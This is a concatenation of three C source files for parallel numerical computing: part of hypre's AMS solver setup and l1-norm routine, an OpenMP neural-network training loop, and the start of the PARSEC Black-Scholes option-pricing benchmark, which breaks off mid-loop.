hypre_ParVectorOwnsPartitioning(y_coord) = 0;
y_data = hypre_VectorData(hypre_ParVectorLocalVector(y_coord));
z_coord = hypre_ParVectorCreate(comm, num_global_vert, vert_part);
hypre_ParVectorInitialize(z_coord);
hypre_ParVectorOwnsData(z_coord) = 1;
hypre_ParVectorOwnsPartitioning(z_coord) = 0;
z_data = hypre_VectorData(hypre_ParVectorLocalVector(z_coord));
vert_start = hypre_ParVectorFirstIndex(x_coord);
vert_end = hypre_ParVectorLastIndex(x_coord);
/* Save coordinates of locally owned vertices */
for (i = 0; i < num_vert; i++)
{
if (vert_number[i] >= vert_start && vert_number[i] <= vert_end)
{
j = (HYPRE_Int)(vert_number[i] - vert_start);
x_data[j] = vert_coord[3*i];
y_data[j] = vert_coord[3*i+1];
z_data[j] = vert_coord[3*i+2];
}
}
/* Change vertex numbers from local to global */
for (i = 0; i < 2*num_edges; i++)
edge_vertex[i] = vert_number[edge_vertex[i]];
/* Construct the local part of G based on edge_vertex */
{
/* HYPRE_Int num_edges = hypre_ParCSRMatrixNumRows(A); */
HYPRE_Int *I = hypre_CTAlloc(HYPRE_Int, num_edges+1, HYPRE_MEMORY_HOST);
HYPRE_Real *data = hypre_CTAlloc(HYPRE_Real, 2*num_edges, HYPRE_MEMORY_HOST);
hypre_CSRMatrix *local = hypre_CSRMatrixCreate (num_edges,
num_global_vert,
2*num_edges);
for (i = 0; i <= num_edges; i++)
I[i] = 2*i;
/* Assume that the edge orientation is based on the vertex indexes */
for (i = 0; i < 2*num_edges; i+=2)
{
data[i] = 1.0;
data[i+1] = -1.0;
}
hypre_CSRMatrixI(local) = I;
hypre_CSRMatrixBigJ(local) = edge_vertex;
hypre_CSRMatrixData(local) = data;
hypre_CSRMatrixRownnz(local) = NULL;
hypre_CSRMatrixOwnsData(local) = 1;
hypre_CSRMatrixNumRownnz(local) = num_edges;
G = hypre_ParCSRMatrixCreate(comm,
hypre_ParCSRMatrixGlobalNumRows(A),
num_global_vert,
hypre_ParCSRMatrixRowStarts(A),
vert_part,
0, 0, 0);
hypre_ParCSRMatrixOwnsRowStarts(G) = 0;
hypre_ParCSRMatrixOwnsColStarts(G) = 1;
hypre_CSRMatrixBigJtoJ(local);
GenerateDiagAndOffd(local, G, vert_start, vert_end);
//hypre_CSRMatrixJ(local) = NULL;
hypre_CSRMatrixDestroy(local);
}
ams_data -> G = G;
ams_data -> x = x_coord;
ams_data -> y = y_coord;
ams_data -> z = z_coord;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSFEIDestroy
*
* Free the additional memory allocated in hypre_AMSFEISetup().
*
* This function is written specifically for input from the FEI and should
* be called before hypre_AMSDestroy().
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSFEIDestroy(void *solver)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
if (ams_data -> G)
hypre_ParCSRMatrixDestroy(ams_data -> G);
if (ams_data -> x)
hypre_ParVectorDestroy(ams_data -> x);
if (ams_data -> y)
hypre_ParVectorDestroy(ams_data -> y);
if (ams_data -> z)
hypre_ParVectorDestroy(ams_data -> z);
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
 * hypre_ParCSRComputeL1NormsThreads
*
* Compute the l1 norms of the rows of a given matrix, depending on
* the option parameter:
*
* option 1 = Compute the l1 norm of the rows
* option 2 = Compute the l1 norm of the (processor) off-diagonal
* part of the rows plus the diagonal of A
* option 3 = Compute the l2 norm^2 of the rows
* option 4 = Truncated version of option 2 based on Remark 6.2 in "Multigrid
* Smoothers for Ultra-Parallel Computing"
*
* The above computations are done in a CF manner, whenever the provided
* cf_marker is not NULL.
*--------------------------------------------------------------------------*/
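/* Worked example (editorial addition): for a row (4, -1, -2) with diagonal 4,
 * assuming the two off-diagonal entries couple to rows owned by other
 * threads or processors:
 *   option 1: |4| + |-1| + |-2|            = 7
 *   option 3: 4^2 + (-1)^2 + (-2)^2        = 21
 *   option 4: |4| + 0.5*(|-1| + |-2|)      = 5.5
 * and since 5.5 > (4/3)*4, option 4 keeps 5.5 rather than truncating to
 * the diagonal.
 */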
HYPRE_Int hypre_ParCSRComputeL1NormsThreads(hypre_ParCSRMatrix *A,
HYPRE_Int option,
HYPRE_Int num_threads,
HYPRE_Int *cf_marker,
HYPRE_Real **l1_norm_ptr)
{
HYPRE_Int i, j, k;
HYPRE_Int num_rows = hypre_ParCSRMatrixNumRows(A);
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Int *A_diag_I = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_J = hypre_CSRMatrixJ(A_diag);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Int *A_offd_I = hypre_CSRMatrixI(A_offd);
HYPRE_Int *A_offd_J = hypre_CSRMatrixJ(A_offd);
HYPRE_Real *A_offd_data = hypre_CSRMatrixData(A_offd);
HYPRE_Int num_cols_offd = hypre_CSRMatrixNumCols(A_offd);
HYPRE_Real diag;
HYPRE_Real *l1_norm = hypre_TAlloc(HYPRE_Real, num_rows, hypre_ParCSRMatrixMemoryLocation(A));
HYPRE_Int ii, ns, ne, rest, size;
HYPRE_Int *cf_marker_offd = NULL;
HYPRE_Int cf_diag;
/* collect the cf marker data from other procs */
if (cf_marker != NULL)
{
HYPRE_Int index;
HYPRE_Int num_sends;
HYPRE_Int start;
HYPRE_Int *int_buf_data = NULL;
hypre_ParCSRCommPkg *comm_pkg = hypre_ParCSRMatrixCommPkg(A);
hypre_ParCSRCommHandle *comm_handle;
if (num_cols_offd)
cf_marker_offd = hypre_CTAlloc(HYPRE_Int, num_cols_offd, HYPRE_MEMORY_HOST);
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
if (hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends))
int_buf_data = hypre_CTAlloc(HYPRE_Int,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j = start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg, i+1); j++)
{
int_buf_data[index++] = cf_marker[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
}
comm_handle = hypre_ParCSRCommHandleCreate(11, comm_pkg, int_buf_data,
cf_marker_offd);
hypre_ParCSRCommHandleDestroy(comm_handle);
hypre_TFree(int_buf_data, HYPRE_MEMORY_HOST);
}
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,k,ns,ne,rest,size,diag,cf_diag) HYPRE_SMP_SCHEDULE
#endif
for (k = 0; k < num_threads; k++)
{
size = num_rows/num_threads;
rest = num_rows - size*num_threads;
if (k < rest)
{
ns = k*size+k;
ne = (k+1)*size+k+1;
}
else
{
ns = k*size+rest;
ne = (k+1)*size+rest;
}
if (option == 1)
{
for (i = ns; i < ne; i++)
{
l1_norm[i] = 0.0;
if (cf_marker == NULL)
{
/* Add the l1 norm of the diag part of the ith row */
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
l1_norm[i] += fabs(A_diag_data[j]);
/* Add the l1 norm of the offd part of the ith row */
if (num_cols_offd)
{
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
l1_norm[i] += fabs(A_offd_data[j]);
}
}
else
{
cf_diag = cf_marker[i];
/* Add the CF l1 norm of the diag part of the ith row */
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
if (cf_diag == cf_marker[A_diag_J[j]])
l1_norm[i] += fabs(A_diag_data[j]);
/* Add the CF l1 norm of the offd part of the ith row */
if (num_cols_offd)
{
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
if (cf_diag == cf_marker_offd[A_offd_J[j]])
l1_norm[i] += fabs(A_offd_data[j]);
}
}
}
}
else if (option == 2)
{
for (i = ns; i < ne; i++)
{
l1_norm[i] = 0.0;
if (cf_marker == NULL)
{
/* Add the diagonal and the local off-thread part of the ith row */
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
{
ii = A_diag_J[j];
if (ii == i || ii < ns || ii >= ne)
l1_norm[i] += fabs(A_diag_data[j]);
}
/* Add the l1 norm of the offd part of the ith row */
if (num_cols_offd)
{
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
l1_norm[i] += fabs(A_offd_data[j]);
}
}
else
{
cf_diag = cf_marker[i];
/* Add the diagonal and the local off-thread part of the ith row */
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
{
ii = A_diag_J[j];
if ((ii == i || ii < ns || ii >= ne) &&
(cf_diag == cf_marker[A_diag_J[j]]))
l1_norm[i] += fabs(A_diag_data[j]);
}
/* Add the CF l1 norm of the offd part of the ith row */
if (num_cols_offd)
{
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
if (cf_diag == cf_marker_offd[A_offd_J[j]])
l1_norm[i] += fabs(A_offd_data[j]);
}
}
}
}
else if (option == 3)
{
for (i = ns; i < ne; i++)
{
l1_norm[i] = 0.0;
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
l1_norm[i] += A_diag_data[j] * A_diag_data[j];
if (num_cols_offd)
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
l1_norm[i] += A_offd_data[j] * A_offd_data[j];
}
}
else if (option == 4)
{
for (i = ns; i < ne; i++)
{
l1_norm[i] = 0.0;
if (cf_marker == NULL)
{
/* Add the diagonal and the local off-thread part of the ith row */
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
{
ii = A_diag_J[j];
if (ii == i || ii < ns || ii >= ne)
{
if (ii == i)
{
diag = fabs(A_diag_data[j]);
l1_norm[i] += fabs(A_diag_data[j]);
}
else
l1_norm[i] += 0.5*fabs(A_diag_data[j]);
}
}
/* Add the l1 norm of the offd part of the ith row */
if (num_cols_offd)
{
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
l1_norm[i] += 0.5*fabs(A_offd_data[j]);
}
}
else
{
cf_diag = cf_marker[i];
/* Add the diagonal and the local off-thread part of the ith row */
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
{
ii = A_diag_J[j];
if ((ii == i || ii < ns || ii >= ne) &&
(cf_diag == cf_marker[A_diag_J[j]]))
{
if (ii == i)
{
diag = fabs(A_diag_data[j]);
l1_norm[i] += fabs(A_diag_data[j]);
}
else
l1_norm[i] += 0.5*fabs(A_diag_data[j]);
}
}
/* Add the CF l1 norm of the offd part of the ith row */
if (num_cols_offd)
{
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
if (cf_diag == cf_marker_offd[A_offd_J[j]])
l1_norm[i] += 0.5*fabs(A_offd_data[j]);
}
}
/* Truncate according to Remark 6.2 */
if (l1_norm[i] <= 4.0/3.0*diag)
l1_norm[i] = diag;
}
}
else if (option == 5) /*stores diagonal of A for Jacobi using matvec, rlx 7 */
{
/* Set the diag element */
for (i = ns; i < ne; i++)
{
l1_norm[i] = A_diag_data[A_diag_I[i]];
if (l1_norm[i] == 0) l1_norm[i] = 1.0;
}
}
if (option < 5)
{
/* Handle negative definite matrices */
for (i = ns; i < ne; i++)
if (A_diag_data[A_diag_I[i]] < 0)
l1_norm[i] = -l1_norm[i];
for (i = ns; i < ne; i++)
/* if (fabs(l1_norm[i]) < DBL_EPSILON) */
if (fabs(l1_norm[i]) == 0.0)
{
hypre_error_in_arg(1);
break;
}
}
}
hypre_TFree(cf_marker_offd, HYPRE_MEMORY_HOST);
*l1_norm_ptr = l1_norm;
return hypre_error_flag;
}
|
NeuralNetwork_OMP_CPU1.c | /* NEURAL NETWORK OMP CPU1.c
* by Lut99
*
* Created:
* 4/18/2020, 11:25:46 PM
* Last edited:
* 19/11/2020, 17:10:57
* Auto updated?
* Yes
*
* Description:
* The NeuralNetwork class implements a matrix-based Feedforward Neural
* Network which is hardcoded to use Mean Squared Error for cost function and
* sigmoid as activation function.
*
* This file implements the first of eight different OpenMP-optimised
 * versions for the CPU. It optimises only the forward pass, using threads.
**/
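/* Quick reference (editorial addition; matches the code below): with sigmoid
 * activation s(z) = 1 / (1 + exp(-z)) and mean squared error, the output
 * layer deltas computed in the backward pass are
 *     delta_n = (t_n - y_n) * y_n * (1 - y_n)
 * because s'(z) = s(z) * (1 - s(z)); hidden deltas are the weighted sum of
 * the next layer's deltas times the same derivative factor.
 */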
#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <string.h>
#include <sys/time.h>
#include "NeuralNetwork.h"
/***** OPTIONAL PARAMETERS *****/
static unsigned int n_threads = 16;
/***** OPENMP DECLARATIONS *****/
extern void omp_set_num_threads(int num_threads);
extern int omp_get_num_procs(void);
extern int omp_get_thread_num(void);
/***** HELPER FUNCTIONS *****/
/* Converts two struct timeval stamps to elapsed time; note that despite the
   MS in the name, this evaluates to seconds */
#define TIMEVAL_TO_MS(T_START, T_END) (((T_END.tv_sec - T_START.tv_sec) * 1000000 + (T_END.tv_usec - T_START.tv_usec)) / 1000000.0)
extern size_t max(size_t length, const size_t* list);
/***** NEURAL NETWORK OPERATIONS *****/
void nn_train(neural_net* nn, size_t n_samples, double** inputs, double** expected, double learning_rate, size_t n_iterations) {
#ifdef BENCHMARK
// Declare all timers
struct timeval s_total, e_total, s_iters, e_iters, s_fwd, e_fwd, s_bck_out, e_bck_out, s_bck_hid, e_bck_hid, s_upd, e_upd;
// Set some shortcuts for the timers
size_t half_iters = n_iterations / 2;
size_t half_samples = n_samples / 2;
// Start the total timer
gettimeofday(&s_total, NULL);
#endif
// Also obtain links to all biases / matrices
double** biases = nn->biases;
double** weights = nn->weights;
// Make some shortcuts for the number-of-nodes information
size_t n_layers = nn->n_layers;
size_t* nodes_per_layer = nn->nodes_per_layer;
// Initialize the temporary delta memory to the correct size
double* deltas = malloc(sizeof(double) * max(n_layers, nodes_per_layer));
// Also make a prev list to avoid accidentally changing the deltas as we go
double* prev_deltas = malloc(sizeof(double) * max(n_layers, nodes_per_layer));
// Create a list that is used to store intermediate outputs. The first
// (input) layer of each sample is linked to the input data rather than copied
double* layer_outputs[n_samples][n_layers];
for (size_t s = 0; s < n_samples; s++) {
// Link the input layer
layer_outputs[s][0] = inputs[s];
// Allocate arrays for the other layers
for (size_t l = 1; l < n_layers; l++) {
layer_outputs[s][l] = malloc(sizeof(double) * nodes_per_layer[l]);
}
}
// Create the delta_biases and delta_weights arrays / matrices
double* delta_biases[nn->n_weights];
double* delta_weights[nn->n_weights];
for(size_t l = 0; l < nn->n_weights; l++) {
delta_biases[l] = malloc(sizeof(double) * nodes_per_layer[l + 1]);
delta_weights[l] = malloc(sizeof(double) * nodes_per_layer[l] * nodes_per_layer[l + 1]);
// Fill with zeros
for (size_t n = 0; n < nodes_per_layer[l + 1]; n++) {
delta_biases[l][n] = 0;
for (size_t prev_n = 0; prev_n < nodes_per_layer[l]; prev_n++) {
delta_weights[l][prev_n * nodes_per_layer[l + 1] + n] = 0;
}
}
}
#ifdef BENCHMARK
// Start the iterations timer
gettimeofday(&s_iters, NULL);
#endif
// Perform the training for n_iterations (always)
for (size_t i = 0; i < n_iterations; i++) {
// Loop through all samples to compute the forward cost
#pragma omp parallel for schedule(static)
for (size_t s = 0; s < n_samples; s++) {
/***** FORWARD PASS *****/
#ifdef BENCHMARK
// Start the forward pass timer
if (i == half_iters && s == half_samples) {
gettimeofday(&s_fwd, NULL);
}
#endif
// sample_outputs holds one output array per layer for this sample
double** sample_outputs = layer_outputs[s];
// Iterate over each layer to feedforward through the network
for (size_t l = 1; l < n_layers; l++) {
// Get some references to the bias list, weight matrix and outputs of the previous and this layer
double* bias = biases[l - 1];
double* weight = weights[l - 1];
double* prev_output = sample_outputs[l - 1];
double* output = sample_outputs[l];
// Compute the activation for each node on this layer
size_t this_nodes = nodes_per_layer[l];
size_t prev_nodes = nodes_per_layer[l - 1];
for (size_t n = 0; n < this_nodes; n++) {
// Sum the weighted inputs for this node
double z = bias[n];
for (size_t prev_n = 0; prev_n < prev_nodes; prev_n++) {
z += prev_output[prev_n] * weight[prev_n * this_nodes + n];
}
// Run the activation function over this input and store it in the output
output[n] = 1 / (1 + exp(-z));
}
}
#ifdef BENCHMARK
// End the forward timer, start the backward pass output timer
if (i == half_iters && s == half_samples) {
gettimeofday(&e_fwd, NULL);
}
#endif
}
/***** BACKWARD PASS *****/
// Implementation: https://towardsdatascience.com/simple-neural-network-implementation-in-c-663f51447547
// Loop through all samples to compute the backward cost
size_t last_nodes = nodes_per_layer[n_layers - 1];
size_t last_prev_nodes = nodes_per_layer[n_layers - 2];
double* last_delta_bias = delta_biases[n_layers - 2];
double* last_delta_weight = delta_weights[n_layers - 2];
for (size_t s = 0; s < n_samples; s++) {
#ifdef BENCHMARK
// End the forward timer, start the backward pass output timer
if (i == half_iters && s == half_samples) {
gettimeofday(&s_bck_out, NULL);
}
#endif
// Backpropagate the error from the last layer to the first.
double** sample_outputs = layer_outputs[s];
double* sample_expected = expected[s];
// Do the output layer: compute the deltas
double* output = sample_outputs[n_layers - 1];
for (size_t n = 0; n < last_nodes; n++) {
double output_val = output[n];
prev_deltas[n] = (sample_expected[n] - output_val) * output_val * (1 - output_val);
}
// Do the output layer: compute the bias & weight updates
// Add all deltas as delta_biases for this layer
for (size_t n = 0; n < last_nodes; n++) {
last_delta_bias[n] += prev_deltas[n];
}
// Same for all the weights, except we compute the delta_weights first
double* last_prev_output = sample_outputs[n_layers - 2];
for (size_t prev_n = 0; prev_n < last_prev_nodes; prev_n++) {
for (size_t n = 0; n < last_nodes; n++) {
last_delta_weight[prev_n * last_nodes + n] += last_prev_output[prev_n] * prev_deltas[n];
}
}
#ifdef BENCHMARK
// End the backward pass output timer, start the backward pass hidden timer
if (i == half_iters && s == half_samples) {
gettimeofday(&e_bck_out, NULL);
gettimeofday(&s_bck_hid, NULL);
}
#endif
// Then, the rest of the hidden layers
for (size_t l = n_layers - 2; l > 0; l--) {
double* delta_bias = delta_biases[l - 1];
double* delta_weight = delta_weights[l - 1];
double* output = sample_outputs[l];
double* prev_output = sample_outputs[l - 1];
size_t next_nodes = nodes_per_layer[l + 1];
size_t this_nodes = nodes_per_layer[l];
size_t prev_nodes = nodes_per_layer[l - 1];
// Loop through all nodes in this layer to compute their deltas by summing all deltas of the next layer in a weighted fashion
double* weight_next = weights[l];
for (size_t n = 0; n < this_nodes; n++) {
// Take the weighted sum of all connection of that node with this layer
double error = 0;
for (size_t next_n = 0; next_n < next_nodes; next_n++) {
error += prev_deltas[next_n] * weight_next[n * next_nodes + next_n];
}
// Multiply the error with the derivative of the activation function to find the result
double output_val = output[n];
deltas[n] = error * output_val * (1 - output_val);
}
// Add all deltas as delta_biases for this layer
for (size_t n = 0; n < this_nodes; n++) {
delta_bias[n] += deltas[n];
}
// Same for all the weights, except we compute the delta_weights first
for (size_t prev_n = 0; prev_n < prev_nodes; prev_n++) {
for (size_t n = 0; n < this_nodes; n++) {
delta_weight[prev_n * this_nodes + n] += prev_output[prev_n] * deltas[n];
}
}
// Swap the two delta lists
double* temp = deltas;
deltas = prev_deltas;
prev_deltas = temp;
}
#ifdef BENCHMARK
// End the backward pass hidden timer
if (i == half_iters && s == half_samples) {
gettimeofday(&e_bck_hid, NULL);
}
#endif
}
#ifdef BENCHMARK
// Start the updates timer
if (i == half_iters) {
gettimeofday(&s_upd, NULL);
}
#endif
// Actually update the weights, and reset the delta updates to 0 for next iteration
#pragma omp parallel for schedule(static)
for (size_t l = 0; l < nn->n_weights; l++) {
double* bias = biases[l];
double* delta_bias = delta_biases[l];
double* weight = weights[l];
double* delta_weight = delta_weights[l];
// Update the biases & reset delta_biases
size_t this_nodes = nodes_per_layer[l + 1];
for (size_t n = 0; n < this_nodes; n++) {
bias[n] += delta_bias[n] * learning_rate;
delta_bias[n] = 0;
}
// Update the weights & reset delta_weights
size_t prev_nodes = nodes_per_layer[l];
for (size_t i = 0; i < this_nodes * prev_nodes; i++) {
weight[i] += delta_weight[i] * learning_rate;
delta_weight[i] = 0;
}
}
#ifdef BENCHMARK
// Stop the updates timer
if (i == half_iters) {
gettimeofday(&e_upd, NULL);
}
#endif
}
#ifdef BENCHMARK
// End the iterations timer
gettimeofday(&e_iters, NULL);
#endif
// Cleanup
// Free the delta biases / weights
for(size_t l = 0; l < n_layers - 1; l++) {
free(delta_biases[l]);
free(delta_weights[l]);
}
// Free the layer_outputs (skip the first, as these merely link the input rather than copy 'em)
for (size_t s = 0; s < n_samples; s++) {
for (size_t l = 1; l < n_layers; l++) {
free(layer_outputs[s][l]);
}
}
// Cleanup the deltas
free(deltas);
free(prev_deltas);
#ifdef BENCHMARK
// End the total timer
gettimeofday(&e_total, NULL);
// Print the results
printf("%f\n", TIMEVAL_TO_MS(s_total, e_total));
printf("%f\n", TIMEVAL_TO_MS(s_iters, e_iters));
printf("%f\n", TIMEVAL_TO_MS(s_fwd, e_fwd));
printf("%f\n", TIMEVAL_TO_MS(s_bck_out, e_bck_out));
printf("%f\n", TIMEVAL_TO_MS(s_bck_hid, e_bck_hid));
printf("%f\n", TIMEVAL_TO_MS(s_upd, e_upd));
#endif
}
/***** OTHER TOOLS *****/
void parse_opt_args(int argc, char** argv) {
// Parse and set number of threads as first argument
if (argc >= 1) {
// Set the number of threads
n_threads = atoi(argv[0]);
}
omp_set_num_threads(n_threads);
}
void print_opt_args() {
printf(" - Variation : OpenMP CPU 1 (Forward only)\n");
printf(" - Number of threads : %u\n", n_threads);
}
|
blackscholes.c | // Copyright (c) 2007 Intel Corp.
// Black-Scholes
// Analytical method for calculating European Options
//
//
// Reference Source: Options, Futures, and Other Derivatives, 3rd Edition,
// Prentice
// Hall, John C. Hull,
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <string.h>
#ifdef ENABLE_PARSEC_HOOKS
#include <hooks.h>
#endif
#define ENABLE_THREADS 1
// Multi-threaded pthreads header
#ifdef ENABLE_THREADS
// Add the following line so that icc 9.0 is compatible with pthread lib.
#define __thread __threadp
#ifdef _XOPEN_SOURCE
#undef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700
#endif
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#ifndef __USE_XOPEN2K
#define __USE_XOPEN2K
#endif
#ifndef __USE_UNIX98
#define __USE_UNIX98
#endif
#include <pthread.h>
#include <time.h>
#define MAX_THREADS 128
pthread_t _M4_threadsTable[MAX_THREADS];
int _M4_threadsTableAllocated[MAX_THREADS];
pthread_mutexattr_t _M4_normalMutexAttr;
int _M4_numThreads = MAX_THREADS;
#undef __thread
#endif
// Multi-threaded OpenMP header
#ifdef ENABLE_OPENMP
#include <omp.h>
#endif
#ifdef ENABLE_TBB
#include "tbb/blocked_range.h"
#include "tbb/parallel_for.h"
#include "tbb/task_scheduler_init.h"
#include "tbb/tick_count.h"
using namespace std;
using namespace tbb;
#endif // ENABLE_TBB
// Multi-threaded header for Windows
#ifdef WIN32
#pragma warning(disable : 4305)
#pragma warning(disable : 4244)
#include <windows.h>
#define WIN32_LEAN_AND_MEAN
#include <shellapi.h>
#endif
// Precision to use for calculations
#define fptype float
#define NUM_RUNS 3
typedef struct OptionData_ {
fptype s; // spot price
fptype strike; // strike price
fptype r; // risk-free interest rate
fptype divq; // dividend rate
fptype v; // volatility
fptype t; // time to maturity or option expiration in years
// (1yr = 1.0, 6mos = 0.5, 3mos = 0.25, ..., etc)
char OptionType; // Option type. "P"=PUT, "C"=CALL
fptype divs; // dividend vals (not used in this test)
fptype DGrefval; // DerivaGem Reference Value
} OptionData;
OptionData *data;
fptype *prices;
int numOptions;
int *otype;
fptype *sptprice;
fptype *strike;
fptype *rate;
fptype *volatility;
fptype *otime;
int numError = 0;
int nThreads;
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// Cumulative Normal Distribution Function
// See Hull, Section 11.8, P.243-244
#define inv_sqrt_2xPI 0.39894228040143270286
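// Editorial note: the polynomial below is the Abramowitz & Stegun 26.2.17
// approximation N(x) ~= 1 - phi(x)*(a1*k + a2*k^2 + a3*k^3 + a4*k^4 + a5*k^5)
// with k = 1/(1 + 0.2316419*x) and phi the standard normal density
// (inv_sqrt_2xPI * exp(-x*x/2)); its absolute error is below 7.5e-8.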
fptype CNDF(fptype InputX) {
int sign;
fptype OutputX;
fptype xInput;
fptype xNPrimeofX;
fptype expValues;
fptype xK2;
fptype xK2_2, xK2_3;
fptype xK2_4, xK2_5;
fptype xLocal, xLocal_1;
fptype xLocal_2, xLocal_3;
// Check for negative value of InputX
if (InputX < 0.0) {
InputX = -InputX;
sign = 1;
} else
sign = 0;
xInput = InputX;
// Compute NPrimeX term common to both four & six decimal accuracy calcs
expValues = exp(-0.5f * InputX * InputX);
xNPrimeofX = expValues;
xNPrimeofX = xNPrimeofX * inv_sqrt_2xPI;
xK2 = 0.2316419 * xInput;
xK2 = 1.0 + xK2;
xK2 = 1.0 / xK2;
xK2_2 = xK2 * xK2;
xK2_3 = xK2_2 * xK2;
xK2_4 = xK2_3 * xK2;
xK2_5 = xK2_4 * xK2;
xLocal_1 = xK2 * 0.319381530;
xLocal_2 = xK2_2 * (-0.356563782);
xLocal_3 = xK2_3 * 1.781477937;
xLocal_2 = xLocal_2 + xLocal_3;
xLocal_3 = xK2_4 * (-1.821255978);
xLocal_2 = xLocal_2 + xLocal_3;
xLocal_3 = xK2_5 * 1.330274429;
xLocal_2 = xLocal_2 + xLocal_3;
xLocal_1 = xLocal_2 + xLocal_1;
xLocal = xLocal_1 * xNPrimeofX;
xLocal = 1.0 - xLocal;
OutputX = xLocal;
if (sign) {
OutputX = 1.0 - OutputX;
}
return OutputX;
}
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
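// Reference (editorial note, matching the computation below): with
//   d1 = (ln(S/K) + (r + v^2/2)*T) / (v*sqrt(T)),  d2 = d1 - v*sqrt(T),
// a European call (otype == 0) is priced as S*N(d1) - K*exp(-r*T)*N(d2)
// and a put as K*exp(-r*T)*N(-d2) - S*N(-d1), using N(-x) = 1 - N(x).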
fptype BlkSchlsEqEuroNoDiv(fptype sptprice, fptype strike, fptype rate,
fptype volatility, fptype time, int otype,
float timet) {
fptype OptionPrice;
// local private working variables for the calculation
fptype xStockPrice;
fptype xStrikePrice;
fptype xRiskFreeRate;
fptype xVolatility;
fptype xTime;
fptype xSqrtTime;
fptype logValues;
fptype xLogTerm;
fptype xD1;
fptype xD2;
fptype xPowerTerm;
fptype xDen;
fptype d1;
fptype d2;
fptype FutureValueX;
fptype NofXd1;
fptype NofXd2;
fptype NegNofXd1;
fptype NegNofXd2;
xStockPrice = sptprice;
xStrikePrice = strike;
xRiskFreeRate = rate;
xVolatility = volatility;
xTime = time;
xSqrtTime = sqrt(xTime);
logValues = log(sptprice / strike);
xLogTerm = logValues;
xPowerTerm = xVolatility * xVolatility;
xPowerTerm = xPowerTerm * 0.5;
xD1 = xRiskFreeRate + xPowerTerm;
xD1 = xD1 * xTime;
xD1 = xD1 + xLogTerm;
xDen = xVolatility * xSqrtTime;
xD1 = xD1 / xDen;
xD2 = xD1 - xDen;
d1 = xD1;
d2 = xD2;
NofXd1 = CNDF(d1);
NofXd2 = CNDF(d2);
FutureValueX = strike * (exp(-(rate) * (time)));
if (otype == 0) {
OptionPrice = (sptprice * NofXd1) - (FutureValueX * NofXd2);
} else {
NegNofXd1 = (1.0 - NofXd1);
NegNofXd2 = (1.0 - NofXd2);
OptionPrice = (FutureValueX * NegNofXd2) - (sptprice * NegNofXd1);
}
return OptionPrice;
}
#ifdef ENABLE_TBB
struct mainWork {
mainWork() {}
mainWork(mainWork &w, tbb::split) {}
void operator()(const tbb::blocked_range<int> &range) const {
fptype price;
int begin = range.begin();
int end = range.end();
for (int i = begin; i != end; i++) {
/* Calling main function to calculate option value based on
* Black & Scholes's equation.
*/
price = BlkSchlsEqEuroNoDiv(sptprice[i], strike[i], rate[i],
volatility[i], otime[i], otype[i], 0);
prices[i] = price;
#ifdef ERR_CHK
fptype priceDelta = data[i].DGrefval - price;
if (fabs(priceDelta) >= 1e-5) {
fprintf(stderr, "Error on %d. Computed=%.5f, Ref=%.5f, Delta=%.5f\n", i,
price, data[i].DGrefval, priceDelta);
numError++;
}
#endif
}
}
};
#endif // ENABLE_TBB
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
#ifdef ENABLE_TBB
int bs_thread(void *tid_ptr) {
int j;
tbb::affinity_partitioner a;
mainWork doall;
for (j = 0; j < NUM_RUNS; j++) {
tbb::parallel_for(tbb::blocked_range<int>(0, numOptions), doall, a);
}
return 1;
}
#else // !ENABLE_TBB
#ifdef WIN32
DWORD WINAPI bs_thread(LPVOID tid_ptr) {
#else
int bs_thread(void *tid_ptr) {
#endif
int i, j;
fptype price;
fptype priceDelta;
int tid = *(int *)tid_ptr;
int start = tid * (numOptions / nThreads);
int end = start + (numOptions / nThreads);
for (j = 0; j < NUM_RUNS; j++) {
#ifdef ENABLE_OPENMP
#pragma omp parallel for private(i, price, priceDelta)
for (i = 0; i < numOptions; i++) {
#else // ENABLE_OPENMP
for (i = start; i < end; i++) {
#endif // ENABLE_OPENMP
/* Calling main function to calculate option value based on
* Black & Scholes's equation.
*/
price = BlkSchlsEqEuroNoDiv(sptprice[i], strike[i], rate[i],
volatility[i], otime[i], otype[i], 0);
prices[i] = price;
